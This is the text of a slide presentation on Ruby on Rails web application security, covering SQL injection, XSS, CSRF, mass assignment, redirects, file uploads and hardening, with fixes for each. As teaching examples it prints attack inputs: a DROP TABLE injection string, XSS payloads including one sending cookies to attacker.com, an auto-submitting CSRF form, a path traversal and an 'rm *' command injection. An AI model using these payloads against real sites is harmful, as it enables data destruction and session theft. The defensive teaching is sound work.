2. About Me
• a.k.a. ihower
• http://ihower.tw
• http://twitter.com/ihower
• http://github.com/ihower
• Ruby on Rails Developer since 2006
• Ruby Taiwan Community
• http://ruby.tw
3. Defense in Depth
• Network: firewalls, IDS
• Operating system
• Web server
• Web application
• Database
4. 75% of attacks are at the
web application layer
(By The Gartnet Group estimation)
5. What is Security?
• a measurement, not a characteristic
• not a simple requirement to be met...
• must be balanced with expense
• it’s easy and relatively inexpensive to provide a sufficient level of security
for most applications. But if you need more...
• must be balanced with usability
• it’s often increase security also decrease the user usability...
• must be part of the design
(from PHP Security Guide: Overview)
6. Okay, your users are evil,
they will give you illegitimate operation and data.
10. Web and Application
Server?
• Server Header
• apache
• nginx
• mongrel
• mod_rails
11. Disable Server Header
Server:Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
Phusion_Passenger/2.2.9
✓ # apache2.conf
ServerSignature Off
ServerTokens Prod
Server:Apache
12. SVN metadata
• GET http://your_site.org/.svn/entries
✓ <DirectoryMatch "^/.*/.svn/">
ErrorDocument 403 /404.html
Order allow,deny
Deny from all
Satisfy All
</DirectoryMatch>
Or just delete it:
http://plog.longwin.com.tw/my_note-unix/2008/01/07/find_delete_svn_directory_2008
13. Sensitive Information
• Do not store sensitive information in the
clear
• cookie
• session(or flash)
• memory for a long time
• log files
• cache
15. Cookie Session Storage
# config/initializers/session_store.rb
ActionController::Base.session = {
:key => '_app_session',
:secret => '0x0dkfj3927dkc7djdh36rkckdfzsg...'
}
• Don’t use a trivial secret
• Don’t store any secret information here
• Or.... just switch to another session storage
16. Session
The session id is a 32 byte long MD5 hash value.
• Hijacking
• Fixation
• reset_session after every login
17. SQL injection
x'; DROP TABLE users; --
Project.find(:all, :conditions => "name = '#{params[:name]}'")
SELECT * FROM projects WHERE name = 'x'; DROP TABLE users; --’
18. SQL injection
vulnerabilities:
• find_by_sql
• execute
• find with conditions in a string
• limit and offset (before rails 2.1.1)
• group_by
• order
19. Always use the hash or
array form
✓
Project.find(:all, :conditions => { :name => params[:name] } )
# or
Project.find(:all, :conditions => ["name = ?", params[:name] ] )
20. Only allow predefine
value
class User < ActiveRecord::Base
✓ def self.find_with_order(order)
raise "SQL Injection Warning" unless ["id","id desc"].include?(order)
find(:all, :limit => 1, :order => order )
end
end
21. Use quote if you need
pass it directly
ActiveRecord::Base::connection.quote
class User < ActiveRecord::Base
✓ def self.find_with_order(order)
find(:all, :order => connection.quote(order) )
end
end
22. Mass assignment
def create
params[:user] #=> {:name => “ow3ned”, :is_admin => true}
@user = User.create(params[:user])
end
def update
@user = User.update_attributes(params[:user])
end
23. Protect it!
✓ class User < ActiveRecord::Base
attr_protected :admin
end
# or
class User < ActiveRecord::Base
attr_accessible :name
end
25. Unscoped finds
class UserOrdersController < ApplicationController
def show
@order = Order.find(params[:id])
end
✓
def show
@order = current_user.orders.find(params[:id]
end
26. Controller Exposing
methods
• Use protected and private
• If use RESTful design, do not use default
routes
• http://ihower.tw/blog/archives/3265
27. XSS(Cross-Site Scripting)
malicious users inject client-side script into web pages viewed by other users
<script>alert('HACK YOU!');</script>
<img src=javascript:alert('HACK YOU!')>
<table background="javascript:alert('HACK YOU!')">
<script>document.write(document.cookie);</script>
<script>document.write('<img src="http://www.attacker.com/' +
document.cookie + '">');</script>
• Do not want to build black-list, you can find more at
http://ha.ckers.org/xss.html
28. XSS Protection (Rails2)
• Use escapeHTML() (or its alias h()) method
• Plugins
• http://github.com/nzkoz/rails_xss (for Rails 2.3)
• http://agilewebdevelopment.com/plugins/safe_erb
• http://code.google.com/p/xss-shield/ (Tainting way)
29. XSS Protection (Rails3)
• Rails 3 auto escape string
• Unless you html_safe or raw string
• “<p>safe</p>”.html_safe
• raw(“<p>safe</p>”)
30. Allow user to use
simple HTML code
• Use white-list sanitize() method
• If you use Textile or Markdown markup
language, you still need sanitize it.
31. CSRF
Cross-Site Request Forgery
Use another users’ authorization token to
interact with a web application as the trusted
user in a malicious way.
32. CSRF protection (1)
• Use GET request for safe operation such as
a query, read operation, or lookup
• Use POST request for any destructive
actions such as create, update, delete
33. But...
• POST requests can be sent automatically,
too. An example:
<a href="http://www.harmless.com/" onclick="
var f = document.createElement('form');
f.style.display = 'none';
this.parentNode.appendChild(f);
f.method = 'POST';
f.action = 'http://www.example.com/account/destroy';
f.submit();
return false;">To the harmless survey</a>
34. CSRF protection (2)
protect_from_forgery will check all POST requests for a security token
✓ class ApplicationController < ActionController::Base
protect_from_forgery
end
<form action="/projects/1" class="edit_project" enctype="multipart/form-data"
id="edit_project_1" method="post">
<div style="margin:0;padding:0;display:inline">
<input name="_method" type="hidden" value="put" />
<input name="authenticity_token" type="hidden" value="cuI
+ljBAcBxcEkv4pbeqLTEnRUb9mUYMgfpkwOtoyiA=" />
</div>
35. Redirection
Do not allow user to pass (parts of) the URL for redirection directly
def legacy
redirect_to(params.update(:action=>'main'))
end
http://www.example.com/site/legacy?param1=xy¶m2=23&host=www.attacker.com
36. File Uploads: Overwrite
• Make sure file uploads don’t overwrite
important files. eg. “../../../etc/passwd”
• Validate file name is simple. Don’t try to
remove malicious parts.
• Use plugins: attachment_fu or paperclip
37. File Uploads: Executable
• never to allow users to upload any extension
associated with executable content on your
site (.php, .cgi ...etc)
• when user download, set the appropriate
Content-Type HTTP header, eliminate the
potential for XSS attacks.
• or never let these files be not accessible to
your web server (outside the DocumentRoot
in Apache)
39. Command Line
Injection
system("/bin/echo","hello; rm *")
# prints "hello; rm *" and does not delete files
40. denial-of-service
attacks (DoS)
• Avoid Long-running action, use background-
processing.
• Don’t bother your application server
• Use Web server provide static files
• Use HTTP reverse proxy if need
41. Host
• Platform (Windows, Linux, Solaris, BSDs)
choosing one which you can trust and familiar
• Firewall
you can use nmap tool to show which ports are open
• SSH: move port 22 to another
• Turn off any services that you aren’t using.
• Hire system administrator to help
Your time as a developer should be spent on the things your are good at.
43. Fail Close
# fail open way, it’s bad
def show
@invoice = Invoice.find(params[:id])
unless @user.validate_code( @invoice.code )
redirect_to :action => 'not_authorized'
end
end
# fail close way
def show
@invoice = Invoice.find(params[:id])
if @user.validate_code( @invoice.code )
✓ else
redirect_to :action => 'authorized
redirect_to :action => 'not_authorized'
end
end
44. Whitelisting
use whitelist, blacklist is hardly complete
admins = %{ihower ihover}
# fail close way
if admins.include? user
✓
redirect_to :action => 'authorized'
else
redirect_to :action => 'not_authorized'
end
# fail open way, don’t do this
if !admins.include? user
redirect_to :action => 'not_authorized'
else
redirect_to :action => 'authorized'
end
45. Conclusion
• Rails has many security features enabled by
default
• SQL quoting
• HTML sanitization
• CSRF protection
46. Reference
• Agile Web Development with Rails 3rd. Chap.27 Securing Your Rails Application
(Pragmatic)
• Rails2 Chap.13 Security and Performance Enhancements (friendsof)
• Advanced Rails Chap.5 Security (O’Reilly)
• Security Audit by Aaron Bedra (Peepcode)
• Security on Rails (Pragmatic)
• PHP Security Guide
• http://blog.innerewut.de/2009/11/3/ruby-en-rails-2009-recap
• http://guides.rubyonrails.org/security.html
• http://www.rorsecurity.info
• http://asciicasts.com/episodes/178-seven-security-tips
• http://www.ultrasaurus.com/sarahblog/2010/01/rails-security-review-checklist/
• http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
• http://www.owasp.org